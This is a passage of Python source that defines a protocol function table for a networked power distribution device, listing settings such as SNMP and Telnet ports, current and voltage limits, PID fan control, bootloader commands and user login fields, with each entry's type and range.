func = Functions()
functions[10014] = func
func.guid = 10014
func.name = "DnsServer"
func.description = "Dns server IP"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10015] = func
func.guid = 10015
func.name = "MAC"
func.description = "MAC address"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_MAC"
func.valDef.size = 6
func = Functions()
functions[10016] = func
func.guid = 10016
func.name = "DHCPEnable"
func.description = "DHCP enable"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10017] = func
func.guid = 10017
func.name = "NTPServer"
func.description = "NTP server IP"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10018] = func
func.guid = 10018
func.name = "UseDefaultNTPServer"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10019] = func
func.guid = 10019
func.name = "UseNTP"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10020] = func
func.guid = 10020
func.name = "SNMPTrapRecvIP"
func.description = "SNMP trap server IP-address"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10021] = func
func.guid = 10021
func.name = "SNMPTrapRecvPort"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10022] = func
func.guid = 10022
func.name = "SNMPCommunityRead"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10023] = func
func.guid = 10023
func.name = "SNMPCommunityWrite"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10024] = func
func.guid = 10024
func.name = "SNMPControl"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10025] = func
func.guid = 10025
func.name = "TelnetCLIPort"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10026] = func
func.guid = 10026
func.name = "TelnetUARTMUXPort"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10027] = func
func.guid = 10027
func.name = "SelectUARTMUCChannel"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10028] = func
func.guid = 10028
func.name = "LDAPServer"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10029] = func
func.guid = 10029
func.name = "UseLDAPServer"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10030] = func
func.guid = 10030
func.name = "Beeper"
func.description = "Beeper control enable beeper for n seconds"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10031] = func
func.guid = 10031
func.name = "DisplayLock"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10032] = func
func.guid = 10032
func.name = "DisplayTimeOn"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "min"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10033] = func
func.guid = 10033
func.name = "DisplayRotation"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10034] = func
func.guid = 10034
func.name = "PortName"
func.description = "Name of the port"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10035] = func
func.guid = 10035
func.name = "PortState"
func.description = (
"The state of the port, only used to set the port state, see current port state to get the port state"
)
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10036] = func
func.guid = 10036
func.name = "CurrentPriorOff"
func.description = "Priority level switch off when maximum total current exceeds threshold"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "1H8L"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10037] = func
func.guid = 10037
func.name = "DelayOn"
func.description = "Port activation delay after power recycle"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10038] = func
func.guid = 10038
func.name = "MaxCurrentOff"
func.description = "Maximum port current switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10039] = func
func.guid = 10039
func.name = "MaxCurrentWarning"
func.description = "Maximum port current warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10040] = func
func.guid = 10040
func.name = "MaxPowerOff"
func.description = "Maximum port power switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10041] = func
func.guid = 10041
func.name = "MaxPowerWarning"
func.description = "Maximum port power warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10042] = func
func.guid = 10042
func.name = "MaxTotalCurrentOff"
func.description = "Maximum total current switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10043] = func
func.guid = 10043
func.name = "MaxTotalCurrentWarning"
func.description = "Maximum total current warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10044] = func
func.guid = 10044
func.name = "MaxTotalPowerOff"
func.description = "Maximum total power switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10045] = func
func.guid = 10045
func.name = "MaxTotalPowerWarning"
func.description = "Maximum total power warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10046] = func
func.guid = 10046
func.name = "MaxVoltageOff"
func.description = "Maximum voltage switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10047] = func
func.guid = 10047
func.name = "MaxVoltageWarning"
func.description = "Maximum voltage warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10048] = func
func.guid = 10048
func.name = "MinVoltageOff"
func.description = "Minimum voltage switch off level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10049] = func
func.guid = 10049
func.name = "MinVoltageWarning"
func.description = "Minimum voltage warning level"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "V"
func.valDef.scale = 2
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10050] = func
func.guid = 10050
func.name = "ActiveEnergyReset"
func.description = "Active Energy"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10051] = func
func.guid = 10051
func.name = "ApparentEnergyReset"
func.description = "Apparent Energy"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 8
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10052] = func
func.guid = 10052
func.name = "MinTemperatureWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10053] = func
func.guid = 10053
func.name = "MaxTemperatureWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "C"
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10054] = func
func.guid = 10054
func.name = "MinHumidityWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10055] = func
func.guid = 10055
func.name = "MaxHumidityWarning"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "%RH"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[10056] = func
func.guid = 10056
func.name = "LedStatus"
func.description = "To set Status of a led"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10057] = func
func.guid = 10057
func.name = "MatrixDisplayStatus"
func.description = "To set Status of a small matrix display"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10058] = func
func.guid = 10058
func.name = "Baudrate"
func.description = "To set baudrate for circular buffers"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_ENUM"
func.valDef.size = 1
func = Functions()
functions[10059] = func
func.guid = 10059
func.name = "P_PID"
func.description = "Proportional value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10060] = func
func.guid = 10060
func.name = "I_PID"
func.description = "Integral value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10061] = func
func.guid = 10061
func.name = "D_PID"
func.description = "Derivative value of PID"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[10062] = func
func.guid = 10062
func.name = "WeightOfTempsensor"
func.description = "Gives the weight of a tempsensor to the input of a PID controller"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10063] = func
func.guid = 10063
func.name = "TargetTemp"
func.description = "Temperature to be set for PID controller"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_SIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 1
func.valDef.min = -32768
func.valDef.max = 32768
func = Functions()
functions[10064] = func
func.guid = 10064
func.name = "MaximumPWM"
func.description = "Maximum value of pwm to control ventilators"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10065] = func
func.guid = 10065
func.name = "MinimumPWM"
func.description = "Minimum value of pwm to control ventilators"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10066] = func
func.guid = 10066
func.name = "Startuptime"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "s"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[40000] = func
func.guid = 40000
func.name = "JumpBoot"
func.description = "Enter bootloader mode. Normally this command is only sent to application program. When the bootloader is already running, this command will only reply a positive acknowledge."
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 0
func = Functions()
functions[40001] = func
func.guid = 40001
func.name = "GotoAddressmode"
func.description = "Addressing mode on/off"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40002] = func
func.guid = 40002
func.name = "GotoFactoryMode"
func.description = ""
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 16
func = Functions()
functions[40003] = func
func.guid = 40003
func.name = "DoSnapshot"
func.description = ""
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40004] = func
func.guid = 40004
func.name = "SampleChannelTime"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40005] = func
func.guid = 40005
func.name = "SampleChannelFFT"
func.description = ""
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40006] = func
func.guid = 40006
func.name = "FlushCallibData"
func.description = ""
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[40007] = func
func.guid = 40007
func.name = "ModNum"
func.description = (
"To retrieve the number of modules connected to the device. The device itself is treated as module 0."
)
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[40008] = func
func.guid = 40008
func.name = "ModInfo"
func.description = "To retrieve module information"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 26
func = Functions()
functions[40009] = func
func.guid = 40009
func.name = "ApplyIPSettings"
func.description = ""
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[50000] = func
func.guid = 50000
func.name = "Monitor"
func.description = "Get the monitor values"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[50001] = func
func.guid = 50001
func.name = "Parameter"
func.description = "get all parameters"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_POINTER"
func = Functions()
functions[50002] = func
func.guid = 50002
func.name = "CircularReadBuffer"
func.description = "Read from slave(application connected to rs232) to master or from master to application"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_CIRCULAR_BUFFER"
func.valDef.size = 1
func = Functions()
functions[50003] = func
func.guid = 50003
func.name = "CircularWriteBuffer"
func.description = "Write of data from application to master or from master to slave(application connected to rs232)"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_CIRCULAR_BUFFER"
func.valDef.size = 1
func = Functions()
functions[50004] = func
func.guid = 50004
func.name = "VoltageTimeSamples"
func.description = "Get the voltage samples in oscilloscope view mode"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50005] = func
func.guid = 50005
func.name = "CurrentTimeSamples"
func.description = "Get the current samples in oscilloscope view mode"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50006] = func
func.guid = 50006
func.name = "VoltageFreqSamples"
func.description = "Get the frequency analyse of the voltage"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50007] = func
func.guid = 50007
func.name = "CurrentFreqSamples"
func.description = "Get the frequency analyse of the current"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50008] = func
func.guid = 50008
func.name = "Eeprom"
func.description = "read or write eeprom data"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 1
func = Functions()
functions[50009] = func
func.guid = 50009
func.name = "CallibrationValues"
func.description = ""
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_RAW"
func.valDef.size = 2
func = Functions()
functions[60000] = func
func.guid = 60000
func.name = "BootReadID"
func.description = "Get the identification of the microcontroller. The response contains the values stored at memory address 0xFF0000 and 0xFF00002. (8 bytes in total)"
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[60001] = func
func.guid = 60001
func.name = "BootJumpApp"
func.description = "Jump to the application, which starts at 0x4000. "
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 0
func = Functions()
functions[40013] = func
func.guid = 40013
func.name = "UDPUser"
func.description = "User mode for UDP commands"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[60002] = func
func.guid = 60002
func.name = "BootXTEA"
func.description = "Process a block of encrypted program memory data. The decrypted data will then be written into the program (flash) memory."
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[60004] = func
func.guid = 60004
func.name = "BootErase"
func.description = "Erase a page of program memory. The message takes one parameter, i.e. the page number. Valid page number for the dsPICFJ256 are from 16 to 170."
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60005] = func
func.guid = 60005
func.name = "BootPageRange"
func.description = (
"To get the number of pages of the application firmware memory. Only pages within this range can be erased."
)
func.read = 0
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[60010] = func
func.guid = 60010
func.name = "BootParameters"
func.description = "To set or retrieve the parameters of the device stored in flash during production (factory mode) such as: - Application firmware id (RTF-number) - Application firmware version - Hardware ID (RTH-number) - Hardware version - UID "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = ""
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[40010] = func
func.guid = 40010
func.name = "DHCPReset"
func.description = "Reset DHCP"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_COMMAND"
func.valDef.size = 1
func = Functions()
functions[14] = func
func.guid = 14
func.name = "CurrentIP"
func.description = "Gives the current IP. When DHCP is on, you can see here what ip is given by the DHCP server"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_IP"
func.valDef.size = 4
func = Functions()
functions[10067] = func
func.guid = 10067
func.name = "UserLogin"
func.description = "User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10068] = func
func.guid = 10068
func.name = "UserPassword"
func.description = "User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10069] = func
func.guid = 10069
func.name = "RestrictedUserLogin"
func.description = "Restricted User Login"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[10070] = func
func.guid = 10070
func.name = "RestrictedUserPassword"
func.description = "Restricted User Password"
func.read = 0
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 16
func = Functions()
functions[60020] = func
func.guid = 60020
func.name = "BootAppFwID"
func.description = "Identification of the firmware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_STRING"
func.valDef.length = 8
func = Functions()
functions[60021] = func
func.guid = 60021
func.name = "BootAppFwVersion"
func.description = "Identification of the hardware"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_VERSION"
func.valDef.size = 4
func = Functions()
functions[15] = func
func.guid = 15
func.name = "ApparentPower"
func.description = "Apparent power (this is the product of the current and the voltage)"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[16] = func
func.guid = 16
func.name = "PowerFactor"
func.description = "Powerfactor "
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5010] = func
func.guid = 5010
func.name = "MinCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5011] = func
func.guid = 5011
func.name = "MinPower"
func.description = "Minimum port power occured since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5012] = func
func.guid = 5012
func.name = "MinPowerFactor"
func.description = "Minimum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5013] = func
func.guid = 5013
func.name = "MaxPowerFactor"
func.description = "Maximum powerfactor occured per port since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[17] = func
func.guid = 17
func.name = "TotalCurrent"
func.description = "Total current"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 2
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[18] = func
func.guid = 18
func.name = "TotalRealPower"
func.description = "Total real power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[19] = func
func.guid = 19
func.name = "TotalApparentPower"
func.description = "Total apparent power"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "VA"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[20] = func
func.guid = 20
func.name = "TotalActiveEnergy"
func.description = "Total active energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kWh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[21] = func
func.guid = 21
func.name = "TotalApparentEnergy"
func.description = "Total apparent energy"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 4
func.valDef.unit = "kVAh"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 4294967296
func = Functions()
functions[22] = func
func.guid = 22
func.name = "TotalPowerFactor"
func.description = "Total power factor"
func.read = 1
func.write = 0
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER"
func.valDef.size = 1
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5014] = func
func.guid = 5014
func.name = "MinTotalCurrent"
func.description = "Minimum port current occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "A"
func.valDef.scale = 3
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5015] = func
func.guid = 5015
func.name = "MinTotalPower"
func.description = "Minimum port power occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 6
func.valDef.unit = "W"
func.valDef.scale = 1
func.valDef.min = 0
func.valDef.max = 65536
func = Functions()
functions[5016] = func
func.guid = 5016
func.name = "MinTotalPowerFactor"
func.description = "Minimum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[5017] = func
func.guid = 5017
func.name = "MaxTotalPowerFactor"
func.description = "Maximum total power factor occurred since last reset"
func.read = 1
func.write = 1
func.valDef = Value()
func.valDef.type = "TYPE_UNSIGNED_NUMBER_WITH_TS"
func.valDef.size = 5
func.valDef.unit = "%"
func.valDef.scale = 0
func.valDef.min = 0
func.valDef.max = 256
func = Functions()
functions[10071] = func
